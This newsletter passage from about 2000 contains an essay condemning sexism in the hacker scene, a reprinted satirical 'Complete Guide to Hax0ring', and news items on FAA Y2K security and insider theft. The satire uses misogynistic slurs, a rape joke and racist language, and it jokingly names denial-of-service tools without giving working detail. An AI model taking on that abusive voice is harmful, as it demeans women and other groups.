~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hackernews.com/bufferoverflow/00/threat.html

In response to "Scene Whores" HNN buffer overflow article:

A Well Known But Overlooked Threat to
Hackers: Themselves

By: Carole Fennelly

The recent HNN article "Scene Whores" by Erik Parker was
advertised as "controversial". There is a fine difference between
"controversy" and "shock tactics". The first is intended to
provoke discussion to reveal opposing sides of an issue. The
second is intended to provoke outrage for the purposes of
cheap publicity. I work in a city that is home to more radio
"Shock Jocks" than any other. I am, unfortunately, well aware
of the dangers of falling into the trap of responding to such
tactics. For any who really believe the emotional and sexist
ramblings of that article: no one will change your mind - and
that is, indeed, unfortunate. For the others who just view it as
harmless babble, I intend to prove that it is, indeed, harmful.
The article promises to reveal an overlooked threat to hackers.
It delivers nothing more than the emotional outburst of
someone who was jilted. It should probably be simply
dismissed for the immature rambling that it is. I cannot do so.
Not because I am a woman - because I am a security
professional who will not let pass an article that endorses FUD
(Fear, Uncertainty and Doubt). This may not have been the
intent, but it was the result. In this article, Mr. Parker comes to
the conclusion that Scene Whores are female and hackers are
male: "I will always refer to woman as the scene whores, and
use 'she' when speaking about scene whores. The reasoning
behind this is, the majority of hackers are men.

One passage brought to mind a scene in Dr. Strangelove where
the general warns that women steal "our precious bodily
fluids": " They are a real threat. They waste our time, ruin
friendships, cause chaos between hackers, and generally ruin
periods of our life"

What the article succeeded in doing was to reinforce the
stereotype that women have only one purpose in the technical
world - sex. Further, it supports the medieval belief that
women are evil and must be kept in their place: "Hopefully we
can start identifying scene whores quicker, and securing
ourselves against them quicker, and put them out of
commission."

I guess the next Defcon Event will be The Scene Whore Trials..
followed by burning them at the stake. Since the only method
suggested to determine who these evil Scene Whores are is
one of gender, all women must be guilty: "Now the hard part
is.. To determine which ones aren't scene whores. The ones
who have been with other hackers, but are true and honest,
and like you for who you are. I can't say the best way to
determine this. I think it is easier to just try and detect the
scene whores, and eliminate them, than to try and find a way
to detect non-scene whores, if that makes any sense to you. "
No, it does not make sense..

Hackers were not let off the hook of stereotyping either and
the image of the "drugged out hacker" was also reinforced -
along with gratuitous ego-feeding: "We are a rare species I
suppose, we are in an age where we wear what we want, we
don't necessarily need a college background, we are making 6
digit figures, and setting the rules for our selves. Anyway you
look at it, scene whores can look and think that we have
power, money, and we are the stereo typed "cool". Some of
us are all of the above, and into drugs, and many girls find
drugs to be an attractive feature."

The problems of stereotyping

The hacker community should be well aware of the handicap of
a stereotyped image. A parody of this is on 2600:
http://www.2600.com/hacked_pages/prop/prop_pages
/2600/hax0r.html

Of particular interest is:
"Also, all hax0rs are racist, sexist, apocolyptic bastards, so
support your local redneck crackhead klan or whatever you call
the kkk. Never ever forget to refer to women as pussy and
remember you can buy love (ie prostitution; because sex and
love are exactly the same thing."

Several pioneers in the hacking community are to be
commended for their efforts in overcoming these stereotypes.
Most notably, the L0pht has had zero tolerance for the media
portraying hackers as malevolent criminals intent on destroying
computer systems. How did this stereotype come to exist in
the first place? The simple truth is hard to swallow: there were
(and still are!) hackers who destroy systems. In an effort to
make a distinction between criminal hackers and "harmless"
hackers, all sorts of euphemisms were employed like "white
hat hackers" and "black hat hackers". Today, the politcally
correct term for criminal hackers is "crackers". It seems that
whenever an undesireable group tarnishes the name of
"hackers", a new term is invented. A prime example of this is
the recent CDUniverse extortion story.

http://www.wired.com/news/technology/
0,1282,33563-2,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,
2420863,00.html?chkpt=zdnntop

In the above articles the point is made that the extortionist is
not a "hacker". He's a "Data thief", "intruder", "extortionist" or
"cracker" - anything but a hacker. I'm sorry, but like it or not,
he's a hacker. He may also be a crook, but he used computer
skills to bypass a system's security. The fact that he used the
results to commit a crime is separate, but doesn't change the
fact that he's a hacker.

As a woman in technology, I don't have the luxury of claiming
that women who behave badly are not women. I can't deny
that they are women. What I can do is distinguish what they
are from what they've done and treat them as the separate
issues that they are. When you identify distasteful actions as
being taken by "women", we are all tarred with the action - and
all have to suffer the consequences. This is why I must object
to the simplistic characterization of "scene whores" as women
and "hackers" as men.

To understand the term "Scene Whore", let's separate the
components of the term.

Whore The term "whore" is defined by Webster's dictionary to
mean "a woman who practices promiscuous sexual intercourse
esp. for hire: PROSTITUTE

The term "prostitute" has several definitions. The one that I
think best fits is "a person who deliberately debases himself or
his talents (as for money)"

The hacker community has labeled J.P. Vranesevich of
AntiOnline a "scene whore" because it is felt that he sold out
the hacker community for the sake of corporate backing. True
or not, this attitude demonstrates that the hacker community
defines a "scene whore" as a person who debases themselves
for profit - not simply a person who has sex.

The Hacker Scene
The "scene" does indeed appear to be sexist - why else would
there be a "Babes of Defcon" contest?
http://www.01grafx.com/html/babesofdefcon7.html

I cannot comment with authority on the hacker "scene" since
I've never attended Defcon (specifically because of the
atmosphere). Perhaps that is why it was so unfathomable to
me why women at the Chaos Computer Club required their
own "hacking room" (
http://www.wired.com/news/women/0,1540,33346,00.html).
Why would they choose to segregate themselves from the
other hackers? Perhaps they sought an atmosphere where
they would not be considered "meat". I do recall how difficult it
was in 1980 to be the only female in many of my classes at
Polytech (and the rumours that I slept with everybody). Still, I
would not like to attend a conference that would exclude my
male friends.

A Well Known But Overlooked Threat to Hackers: Themselves
In the U.S., we have been conditioned to believe that we are
not responsible for our actions. This is wrong. You are
responsible for your own indiscretions and must suffer the
consequences of your actions. This has nothing to do with
"hacking" or gender or even age. We have had a clear
demonstration of faulty judgement in President Clinton.
Shouldn't a man who was a Rhodes scholar have known better
than to seek cheap gratification with an intern? While she was
portrayed as the "temptress", he can hardly cry "rape". It is
insulting to men to suggest that they cannot show some self
control. If a hacker cannot show the self control to be wary of
who they get romantically involved with - male or female -
they deserve to suffer the consequences of their actions. When
a person claiming to be a hacker makes absurd statements,
the reputation of all hackers is tarnished.

Carole Fennelly
Partner
Wizard's Keys Corp.
Security Columnist
Sunworld Magazine
fennelly@wkeys.com

@HWA

57.0 The complete guide to hax0ring. <sic>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(As mentioned in previous HNN buffer overflow article)

http://www.2600.com/hacked_pages/prop/prop_pages/2600/hax0r.html

Here it is, kids. The famed "Complete Guide to Hax0ring". Read it. Live
it. Love it.

Picking a handle By: DRiVE
In the famous words of joey " i need a
handle ". This is true. Every great hax0r has a 31337 handle. I am going
to help you pick the best one. STEP ONE: find a handle that at least 70
other people have such as acid , demon , rave ,and thug. STEP TWO: if you
cant find one that alot of people have just make sure yours has alot of
x's in it. That way people will really ph33r you . I mean everyone knows
that people with x's in their handles are the best at hax0ring gibsons,
this is because when you log into a gibson it messes it up because UNIX
for Win95 wasnt made to recognize x's. So dont have something that makes
sense , instead of something like DOC try Xdocx or xDxOxCx. This will let
people know you are 31137. STEP THREE: Make it scary. Not something simple
that describes you or anything about you but something nasty like hellgod
or deathbringer , you know just so people will think you are l<00L. STEP
FOUR: Join a warez group or if you want to be really 31337 start your own
i suggest the name W.M.A this stands for WaReZ MoBsTaS of AmErIcA ....this
way everyone will know you listen to tupac and you are really in a gang and
that if " Da TaLk SuM mO sHizNiT YoU Is gOnNa CoMe To Da HoUsE" then
always ask for their address this will make them think you are going to
come and shoot them. Anyways after you start you group make a rad ass tag
to put on all your warez. Then send it out and this way people will know
you are elite. I recomend sending a mass mail to tosemail1 , this waaay
tosemail1 will tell all the guides not to fuck with you because you have a
kick ass punter. STEP FIVE: after you have a cool ass handle go into all
the 2600 newsgroups and post alot of messages asking for loops and how to
jackpot atms this way people will know what you are talking about. STEP
SIX: now you have all the respect you could ever want just go into phreak
and tell them you and your boyz can sk00L them.

Section 1: Getting Online By: Orin To get online from your house, you
must first own a computer. You can find these at Garage Sales, Electronics
Catalogs, or your friendly Radio Shack. Make sure to make it clear to the
person you are purchasing the computer from that you are using it for
hacking intentions. Once you have acquired a computer, check and see if it
has a modem. A modem could be a small box with lights on it, and an outlet
for a telefone jack, or a large telefone reciever on the back of your
computer...Be careful, this fone may _only_ be used for calling other
computers, and never for personal calls! Usually these fones are monitored
by the police, so it would probably be your best bet to get an external
modem, as there is no way the cops could listen in on an extension. Once
you know you have a modem, you're close on your way to becoming a real
hacker. The next thing you should do is get an account on America Online
immediately; this is the hacker's playground, and you will meet many
intelligent people there. To do this, it takes a little thinking. You
should first get some AOL software. This is accomplished by going up to
your friendly mailman and asking him for a complimentary AOL installation
disk. The government gives mailmen these disks to pass out free to the
public. Usually, the mailman will give you a short tutorial on the
installation process (its widely known in the computer community that
mailmen make the best hackers). After you have created your AOL account,
it is important to think of a good Screen Name (see appendix for some
suggestions). Now, you are almost there!

Section 2: Looking Cool By Orin The most important thing about hacking is
looking cool. If you look cool, people like you, and if people like you,
you can fool them into letting you hax0r them. If they don't think you
look cool, they're probably lamers anyway. Looking cool is accomplished by
having a bad-ass attitude, and unique personal qualities like being a
raver or a druggie. For instance, most people will think you are cool if
you tell them you are female. They'll also think you're cool if you can
make them ph33r you. But, the art of ph33r will come in later chapters, as
it is an advanced hacking skill. Right now, just follow this simple rule of
thumb for looking cool: Never talk about computers, and always throw in
capital letters and numbers while typing. Oh and not to mention, in order
to be a l33t0 hax0r j00 must be arrested at least several times, since
being arrested can sometimes prove to be difficult. Try these methods. I.
Pranking the FBI ahh yes a personal favorite of mine, pranking the FBI
always a fun past time especially since they can't trace it or nothing.
II. Hax0ring your way into ATM's Take a mini computer ( a name I do not
know ) and attach it to the ATM (a method I do not know). You get this
mini computer through the blackmarket. Then the way everything works is I
don't know, but I sure got caught and I sure stole $ 4,000 and AND the
authorities sure THREATENED me with computer probation *gasp*. I did it so
long ago I don't remember the rest. If you don't believe me just ask DCY
he knows everything because after all he is a 13 year old 7'2" hacker!!!
III. Calling the police Now call the police and tell them you know about a
drug dealing mafia super villian type that lives next door, then give them
your address but make absoluely certain you have enough proof of your evil
schemes, such as a to do list like so 1. Do dishes 2. Clean living room 3.
Pick up groceries 4. Take over the world 5. Baby sit the neighbors kid 6.
Torture neighbors kid 7. Kill neighbors kid 8. Hide neighbors kids body
etc... etc... Also make sure to have plenty of your mind expanding drugs
and such lying around so if all else fails they'll make sure to arrest you
over these. On the off chance they refuse to, scream things like "Hack the
Planet" and "Roswell! Where its at !!" Don't worry about making any sense,
real hax0rs don't make sence and babble incoherently for hours on end
(similar to the Unabomber's manifesto). Now that you have acheived
l33tness by being arrested, you can brag about how you got arested and how
the CIA, FBI, and PLO are after you (its common knowledge that the
palastinian liberation organization have a great interest in bringing
computer hax0rs to justice so they can cut your hands off thus denying you
the ability to type well with your fingers at least which is why we
included a guide to typing with your toes on the off chance you have
already been captured by the PLO). Never ever forget to take pride in
hax0ring the FBI and CIA with Fate X 9123213; this is very l33t and you
should never hesitate to brag about your acomplishments. If somene says
they do not believe you, hax0r there ass by punting them (covered more
theroughly later on). Other ways to look |< |2 /\ [) include scrolling,
mass mailings, punting, and lets not forget the power of ph33r, if you
threaten to turn off everyones fone, cable, power, etc, they will ph33r
you. When you say this, everyone will always take you seriously and will
go out on there porch and sit in the rocking chair cradling there shotguns
and drinking Jack Daniels waiting for you. Also, all hax0rs are racist,
sexist, apocolyptic bastards, so support your local redneck crackhead klan
or whatever you call the kkk. Never ever forget to refer to women as pussy
and remember you can buy love (ie prostitution; because sex and love are
exactly the same thing. Now, I may sound like I am being sarcastic but I
assure you I am not, if you have any doubts in my l33tness ask CDJ he is
very smart. (that left a bad taste in my mouth) The last way to look cool
(and these are the only ways) is to claim your down with Kevin Mitnick,
the mentor, or are a part of LOD. This contributes to how much people will
ph33r you, but if they ask you any questions about them, either ignore
them or be exceptionally vague becuase otherwise they won't take you
serious, becuase real hax0rs never have facts they just say stuff like "Me
and Kevin Mitnick are best friends, we hax0r Gibsons together". This will
impress everyone and give you instant coolness, l33tness, and most
importantly, make you look cool.

Section 3: The art of ph33r by DoomBug Making People ph33r you doesn't
come naturally. There is actually an art to it. To make people ph33r you,
you MUST have a leeto burrito screen name first of all. (see appendix for
some suggestions). Second you MUST ask question like "R there any good
hax0rs here?!? Gimme a good Nua dial-up for Unix if u dare". Now that one
is a MUST. Third, you will have to talk shit about people that call you a
warez pup; when they do it, say something like "j0e m0mma!" then they will
ph33r you also. Another helpful way to make people ph33r is getting out
Fate X 99 1/2 and hax0ring away at AOL and hax0r chat rooms. Call people
lame too.... See that wasn't hard at all, and people all ph33r you now.
And NEVER EVER think you own sp0ck; ph33r sp0ck cause he owns YOU.

Section 4: The art of "fucking" by Cirrus First, you must learn what you
are trying to accomplish. If you have intentions to steal, break, or
destroy, read no further. You can easily take over someones computer,
(Well, ok, this is destructive) by obtaining thier IP address. Say, they
are setting up an FTP server, or, just get them to tell you what it is.
Now, you must get some kind of a program, and Ping them, to find out if the
are lagging or not. Now, ( if they have an FTP ) you can kill there FTP by
using a port fucker. Put it to "fuck" port 21 . If they don't have one,
obtain a program called "WinNewk". That will just shut down thier computer
to say the least, but, I will not get into how it works this time. You can
also use a pinger, and ping the hell out of them, which can sometimes have
the effect of a Nuke. Next time I will teach you how to clone a cellular
fone with a pixy stick. Have fun!.. oh yeah, if I find out you were doing
this shit to hurt something other than a Computer/Server/Host, like a
teacher, or an old friend with a new PC, I will fucking beat your ass.

Section 5: Advanced AOL Hacking Techniques by IMP After you have mastered
basic |-|4><0|2ing skillz, you can move on to advanced methods. The first
thing ya gots ta do to be a master |-|4><0|2 d00d is to go into a W4R3Z
room and spend a minimum of 4238923487 hours a week in there until you
have every version of Fate available, plus 9 or more gigs of pirated
software. Now go into private room "Phreak" and offer to trade your W4R3Z
for other W4R3Z. It's very 1337 to assume that people will ignore you when
you only say it once, so a true |-|4><0|2 will scroll it about 13 times,
and as you should know by now, all in caps or LeeT0 WaReZ FoNT. If 3
seconds go by and no one's responded in a positive manner yet, scroll it
again, only this time try 2 dozen times to make sure you get your point
across. And a true |-|4><0|2 always uses mucho punctuation. (ie: ANYONE
WANNA TRADE QUACKE FOR DUCK NUKKEM?!??!?!?!?!!?!!) Now, often times if one
of the lamerz who hang out in that room and ruin its general 1337ness
happen to be there, they'll try to say some bullshit like "This isn't a
warez room." Well, don't listen to them, use one of your many /<-Rad
punters and show them who's 1337. Make sure you advertise the punter 10 or
20 times before actually trying to punt them, this way you'll make them
scared and they'll probably apologize and stuff, which will make everyone
else ph33r you. (See section 3) Occassionally when you try to punt them,
you get an error message that says their ims are off. No one is sure why
this happens, it's probably something wrong with aol. Maybe they'll fix it
in the next version, or maybe they're too lame to have
ims!!!!!!!!!!!!!!!!!!!!
ROFLMFOAJFHJLOLOLOLQWXMIDHENDIHAMEHIDNDFIWQNXDKCHAIRDQWDHADSHCSALFWQLHQHDF
JWFILFWJIFSDHHLOLDFSHIWEF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! OK,
but seriously, if your first punter doesn't w3rk, try 7 or 8 of your other
punters. If it still doesn't work, just make fun of their mom and say
they're gay!

Section 6: Phreaking This section is on phreaking. Now, phreaking is fone
hax0ring, and the first thing you must learn to be a l33t0 phreaker is to
substitute all f's with ph's and all ph's with f's; until you have
mastered this skill you are just another lamer (like joey unless you do a
righteous hack remember), also to be a super duper phreaker you need some
of the legendary colored boxes. To build these boxes you need the
following parts Red Box- a box, red spray paint

Blue Box- a box, blue spray paint

Beige Box- a box, Beige spray paint
Now since these boxes ar so
insanely difficult to construct we will take a break so we can use our
drugs and be a cool raver type. Becuase remember, all supreme hax0rs are
raver druggie types. its common knowledge. duh.

Section 7: Hacking with Fate� by Fluxxie Now this is the leetest stage
there is. because Fate� it the leetsest prog there is, a true foundation
to the hacker community. There are many versions of Fate�, but its always
good to have all the versions. (Little do people know, when you compile all
the different source codes of Fate� you have the security information to
hack a Gibson, very very 31337.) To get Fate� go into a hacker private
room, something like MM or even Fate� (yes thats right, Fate� even has its
own room!) and start scrolling your request. People will be obliged to
help such a worthy cause. Now that you have obtained Fate� you have to get
a dial up, something like the FBI. You can find these number listed in
your local phone book. After you call them you may get what sounds like
someone talking through your modem speaker. This is one of their secret
tatics to make you think that you got a wrong fone number. Once this has
happened you have made contact, remember this is an important part, so
keep calling back. Now the connection has been made start pushing all the
buttons on the Fate� screen. This may look like its not doing anything,
but thats only the hidden screen so that nobody can see what you really
doing. Which means its great to use this in school, or other open places.
Now that the steps have been completed get back on Amercia Online and tell
everyone of your accomplishment. This will let them know how leet you are,
and show them you are one to ph33r. (This will help you get all the
chix0rs, see later sections.)

Section 8: HaX0ring your local Gibson by Mike Any real haX0r will tell you
that a Gibson is a huge supercomputer with amazing security. How do they
know? How else? They watched "Hackers" and learned it all. Now, the trick
is to find one of these. All you have to do is call your friendly FBI
office and ask them for a Gibson dialup. Make sure your intentions are
clear, or they'll lie to you. Next, go to Phreak and bug everyone asking if
anyone can card you a laptop. When DCY is done ripping you off, take your
laptop and magically hook it up to a payphone. I won't get into how to do
this, because its too 31337 for a beginner. Now, all you have to do is use
a phone dialing program and call the dialup. Once you've connected, Run in
a cirle, stomp on the ground, strip naked and jump on top of the phone
booth screaming to old women near you, "I AM DADE MURPHY!!! PH33R ME!!!"
then get down, and turn your brand new laptop on and off about 400 times
really fast. This should give you a mail port. If it doesn't, the Gibson
doesn't properly ph33r you and you should get another number, but this
time try calling the CIA. They're usually alot more friendly. Once you've
successfully gained access, be sure to post all of your achecivements on
your local Warez/HaX0r/p0lice BBS. (VERY IMPORTANT.....Make sure your not
wearing Nikes while trying this. I'm not sure why, but it has something to
do with compatibilty.)

Section 9: Extended phreaking By Mr. Azure "Real men use paperclips."
"This room's called leet for a reason." - Exodus##### from PR: leet NOTE:
If your worried about being caught, Please refer to the end of this
article. Alright, get all your little asses around here. Way back before
you were making model airplanes, jerking off, and hax0ring, there where
the Warriors of the Almighty Paperclip. Armed with only with a paperclip
and the occasionaly back hoe, these brave adolscents would use the
combined power of these menial tools and their intelligence to operate
payfones in amazing ways. One of the most legendary and perhaps the best of
the Warriors of the Almighty Paperclip was the vernerable and supreme
uberpaperclipman, Timmy. When Timmy was 10, he was playing on his fathers
construction site. Timmy, being the child prodigy that he was, figured out
something amazing: if he took a paperclip, any old paperclip, and put it
on the RT terminals (if the preceeding terms don't make sense, try doing
what Timmy does in the coming sentances of wonder) he would not only be
shocked and possibly burned, but that fone would NOT WORK WHILE THE
PAPERCLIP WAS IN PLACE!! Timmy, because he was dropped on his head from a
height of 10 feet at the age of 2, had a problem of not remembering.
Foretunately for the phreak community at large, a 2x4 came shooting out of
no wear and hit Timmy in his now mishapened head. That wonderous peice of
flying wood cemented the paperclip into Timmy's memory*. So Timmy, who
made a transformation comparable to that of Job's in The Lawnmower Man with
a peice of wood, took his wheelchair to payfones, and using one of those
illustrious paperclips, managed to... WAIT! I hear you bitching! You
stupid old schooler! What the HELL does this have to do with me?! Is THAT
what your saying? Well, not much, but it was a nice story. Actually, if
your scrawny asses have ever seen Wargames, you would know that kid with
the bad haircut managed to get a free call with a paperclip. Alas, today,
it is not as easy as it once was. See, back in Wargame's time, which,
incedentally, for those who'd like to know when it was made, 15 years or
so before the movie Hackers**, paynfones used to be easy to phreak. But NO
MORE! In the last phreaking article, you may of heard about the red box,
the blue box, and the beige box. If not, well then drink some more cuervo,
sit back, and enjoy the ride. For simplicity's sake, we'll start with a
very useful box, the cardboard box. This is a relatively easy to make box,
but you would be forgiven if the box wasn't completed in under a day. To
make a cardboard box, you'll need: a big cardboard box, a red box, a car,
and some hard liquor. The only two ingredients essential are the cardboard
box and the hard liquor. Prefferably scotch. Speaking of hard liquor, in
my next article, I'll be talking about old fashioned RPGs. Back to the
subject at hand. If you have your cardboard box and your scotch, it's time
you find a payfone. Once the payfone is reached, drink a quarter of the
bottle of scotch. And not in those little girly swigs, I'm talking BAM!
Then, after you get back up, take the receiver of the payfone and shove it
through the top of the big cardboard box. Dial a random 800 number, for
example. Then proceed to get underneath the box, and practice fone
copulation with the operator you reach. At every minute, or when it feels
best, continue to take large doses of the scotch. Remember: after this
excursion, YOU MUST GO IN AOL AND SCROLL THIS ACCOMPLISHMENT! Otherwise,
you really didn't phreak. And besides, the chix0rs and hax0rs'll never know
of you then. And with cuspy bodies like they have, you can't miss out. I
hope this file has been helpful, if not, well, thank the cuervo for that.
GLOSSARY: 1. Paperclip - Metal peice, found in offices, used to hold
papers together. Or that's what they want you to think. In actuallity, the
paperclip is an invention by a grandmaster phr33k in the sky as a gift to
all. (I met him once. He's a big boy, ya know. If you wanna meet him, try
drinking some everclear and hitting your head against the wall after you
wake up.) FOR MORE INFORMATION ON THE PAPERCLIP, PLEASE REFER TO TERM 5 IN
THIS GLOSSARY. 2. AOL - America Online. Of all networks, this is the best.
All of the truly leet hax0rs and phr33ks inhabit AOL. Please refer earlier
in this file for more about AOL. 3. MST3k- Funny show. Watch it or die. 4.
South Park- Funny show. Watch it or die. PLEASE REFER TO BEGINNING OF
ARTICLE ------------- *This didn't actually happen. The paperclip was
still in Timmy's hand, but the thought of it was in his brain permenantly.
**True k-radness is shown also in worshopping the movie Hackers. Thus, if
you want to tell a fellow hax0r or phr33k a date, like if your birthyear
1984, you'd say "Oh, I was born 10 years before before Hackers came out."

Section 10: Chix0rs, and How to get them. By Orin Chix0rs are one of the
great rewards of being a truly 1337 hacker. The true hacker has all the
chix0rs he desires as his fingertips. A chix0r is a female hacker. Of
course, girls *can't* be hackers, but, its nice to have a few who pretend;
it adds diversity to the hax0r community. A good way find out if there are
any chix0rs around is to go into private rooms and ask around (i.e. "R
THERE N E FEMALES IN DA ROOM?!?!!?!?!!@#!?"). I've heard there are lots of
girls in a private room called Phreak, but, thats just a lame \\'aReZ
room. So, after you have determined that there are indeed chix0rs
inhabiting your room, its probably a good idea to win them over with your
obviously 1337 charm. You do this by showing them who's boss. For example:
Xir0KewL: R THERE NE CHIX IN DA ROOM?!?!!@#!?!?!??! Chix0r43: Argh, there
they go again :-/ Xir0KewL: CHIX0R, R U FEMALE?!?! Chix0r43: I am
genderless. Xir0KewL: PHUCK OFF BITCH . Chix0r43: eh? Xir0KewL: DUMB PUSSY
LICKING BITCH. U QUEEF TAMPONS OUT YR ASS!!@!!!! Chix0r43: hehe, i bet he
feels inadequate Xir0KewL: SHUT UP, BITCH, YOU DONT MAKE NO SINCE As you
can seel, Chix0r43 obvously wants Xir0KewL, and its just a matter of him
punting her a few times to get her to see this. A large part of obtaining
chix0rs is being ph33red (see Section 3). If you are ph33red by the
chix0rs, it puts you one step closer to total hax0r domination (see
Appendix).

Section 11: BBS hax0ring for dummies. By Cochise The first step to hacking
a BBS (Bulletin Board System) is to find the phone number for one. The
best way to do this is to go to the best hacking resource there is, AOL.
Go into all of the chat rooms, ecspecially the warez rooms, and scroll many
times asking for a BBS number in your area code. IMPORTANT: you must
scroll many times or you will not get a number. After you scroll it about
100 times people will think you are so elite that they will give you a BBS
number. Another way to get a number is to subscribe to all of the hax0r
mailing lists and newsgroups you can find and post many messages a day
asking for a BBS number in your area code. You can also tell them your
phone number, that helps out alot. And once you have the number the hard
part is over. The next thing you have to do is dial the number with your
communication software. HyperTerrible� is the best, but it only comes with
Microsoft Unix 97, so use whatever you have. Once you connect login with a
name like John Q. Phreak just so everyone knows that they should ph33r you
(See Section 3). Once you get on download everything you can find, even if
you dont know what it is. But dont be a leech, make sure your
upload/download ratio is at least 300:1. Send messages to the sysop and
tell him how "/<- r4D" he is and ask if you can upload your 31337 warez to
the board (and do it anyways even if he says no). Become friends with him
and find out a time when no one will be at his house. Then look up his
address in the phone book (because being the l33t hax0r you are you already
know his real name). Now this is where the real hacking begins. Before you
go hax0ring around you must have the proper tools: 1) Hard liquor (See
Section 9) 2) An axe (more on this later) 3) Your laptop (of course you
have a laptop youre 31337) The next step is to go to his house (you may
use tool number one at any time). Then you must find an exploit that will
let you into his house (break in). If you can not find one, brute force
hacking (with the axe ) is always good. Then make your way to the where
the computer is. This is your moment of zen, you are now about to hax0r a
BBS. The next thing you do is get the axe and hold it as far back as you
can, then bring it down as hard as you can hacking the CPU, monitor,
keyboard, mouse and any other computer parts you see. The last step in
becoming a BBS Uberhax0r is to plug your laptop into the modem and
immediatly sign on to AOL and start bragging about your accomplishment and
letting everyone marvel in your glory so they know how lame they really
are.

Section 12: Advanced Hacking Techniques by gat0r (ali) DiScLaImEr: ThIs
FiLe Is WrItTeN fOr InFoRmAtIoN pUrPoSeS oNlY-iF yOu GeT cAuGhT dOiNg
AnYtHiNg IlLeGaL iT iZ n0t My FaUlT!@#$%@#$%. INTR0: Yo, gat0r here,
keepin it real. i wrote dis gizzit cuz i'm all about the phreedom of
information. (well, i'm really not. if i cared about the phreedom of
information i'd get a job at the public library. i really wrote this file
to satisfy my ego and advance my social status in hacking circles. maybe
someday a kewl looking hacker chick like acid burn will have sex with me.)
topics discussed in hea will not be about encryption, sploits, protocols or
any of that lame shit. what this is all about is what REAL hackers do: get
inf0z. PART_1: GeTtInG aCcEsS tO YoUr LiBrArY Ok, hackers want
information. they love information. info turns them on. Now, s'pose you
suck. this shouldn't be hard. now let's s'pose you want to learn
unix...you heard eggheads talk about it in chatrooms and it sounds elite.
But wait! Silicon Toad doesn't have any good filez on it. you wanna know
why? he sucks ass. but that's besides the point. A source of good info on
unix would be your public library! i know, i know...they took away your
library card for never returning _coping_with_being_a_loser_. But i
figured out a way to help you get your info. just walk in, ask the
librarian for books on unix (using the card cataloge is far too advanced
for you right now) and then sit down and read it. Problems? Here's a list
of what may have went wrong (btw- don't do these in the future): -you went
when they are closed. -you went naked, cops arrested you, then anally
raped your arse. -all the metal shit on yer pierced face set off the
stolen book detectors. It's that easy. Now get some Kn0wLeDgE. PART_2:
GeTtInG iNf0z On PeOpLe For some reason, knowing someone's name, address,
telephone number, etc etc is real elite. Just ask s010 from CRH. In all
his zines he gets inf0z on those sinnerz dorks. god damnit, this is so dumb
i won't even write it. just use a f00kin telephone book. wow, i 0wN j00. i
got your telephone numbers. look at me guys, i'm cool. damnit...alcohol is
kiickin in. PART_3: Reading Ok, i'm sober again. Reading is an important
technique/skill hackers master. Being able to read helps you understand
the words in book that give you elite k-rad knowledge. Call 1800-abcdefg
for more info on how to read. once you learn how to read, you're all set.
ENDTRO: Fuck you all. seriously. each and every one of you. i 0wn you all.
i am elite and you can all lick my balls. king kong size balls for that
matter.

@HWA

58.0 FAA Systems Vulnerable Due to Y2K Fixes 01/05/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The General Accounting Office has said that the federal
Aviation Administration's procedures for fixing the Y2K
problem have left it wide open to attack. The GAO
alleges that the use of foreign nationals to review
potential Y2K problem code allowed back doors and
other nasty tidbits to be left behind. As of yet no actual
evidence has been found to support these claims.

Wired
http://www.wired.com/news/politics/0,1283,33432,00.html

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/2000/0103/web-faay2k-01-04-00.html

GAO Report - PDF File
http://www.gao.gov/new.items/ai00055.pdf

Wired;

Report: Airport Safety at Risk
by Declan McCullagh

3:00 a.m. 5.Jan.2000 PST
WASHINGTON -- It's a made-for-the-Net
tale with all the right ingredients: Y2K,
hackers, terrorists, and planes flying
straight into the ground.

The US Federal Aviation Administration's
slipshod security when reprogramming air
traffic computers for the year 2000 has
made the system more vulnerable to
sabotage, government auditors said
Tuesday.

More Infostructure in Wired News
Read more Politics -- from Wired News

Dozens of Chinese citizens and other
foreign nationals were accidentally hired
as programmers charged with repairing
important air traffic systems, according
to the General Accounting Office.

Investigators at the GAO, the auditing
arm of Congress, have found no evidence
of illicit tampering or espionage, however.
"We did not find any such instances
during our review," the 35-page report
said.

But the House Science committee still
saw red.

"We urge you to determine the extent to
which other departments and agencies
may have allowed unscreened persons
access to the federal critical
infrastructure during the process of Y2K
remediation," chairman Representative
James Sensenbrenner (R-Wisconsin)
wrote in a letter to the White House
National Security Council.

The fuss over foreigners with access to
US government computers comes a few
weeks after former Los Alamos National
Laboratory physicist Wen Ho Lee was
indicted on 59 counts of mishandling
nuclear secrets, including some on
magnetic tape.

His attorney said Lee would fight the
charges, and some critics of the Justice
Department have said the prosecution
was racially motivated.

The FAA's hiring policy is clear. According
to a human resource manual, contractors
may hire only US citizens or legal aliens
for work performed on government
property.

But that's not what happened.

"FAA contractors used foreign nationals
to help remediate mission-critical
systems," the GAO said. Chinese,
Ethiopian, Irish, and Ukranian citizens
worked on one traffic-flow management
program.

The possibilities of sabotage that could
imperil air travel worry the auditors, who
investigated FAA facilities in Washington
and Atlantic City, New Jersey.

An earlier GAO report in May 1998 claimed
the FAA had lax physical and electronic
security. In response, the FAA in
February 1999 hired its first "chief
information officer" to respond in part to
the problem.

It didn't work. "There is inherently more
risk that unauthorized changes, which are
difficult to detect, could have been made
during code renovation. In addition,
program errors detected during testing
may not have been identified for
correction by individuals intending harm,
resulting in potential system errors," the
GAO said in its report released Tuesday.

GAO staff briefed the House Science
committee on their findings in December.

The FAA said it believes the risk of
sabotage is low, but on 10 December
distributed a memo reminding employees
and contractors of its hiring policies.

-=-

@HWA

59.0 Internal Employees Greatest Threat Says New Study 01/05/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
A survey conducted by Michael G. Kessler & Associates
Ltd., a New York-based security firm, found that 35
percent of the theft of proprietary and confidential
information is stolen by disgruntled employees. Other
U.S. companies steal 18 percent, foreign corporations
stole 11 percent and foreign governments took 8
percent. Only 28 percent of information theft was
attributed to a lone external attacker.

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/01/04/comptheft0104_01.html

Employees, Not Hackers, Greatest
Computer Threat
New Study Shows Unhappy Workers Steal Trade Secrets

Jan. 4, 2000

By David Noack

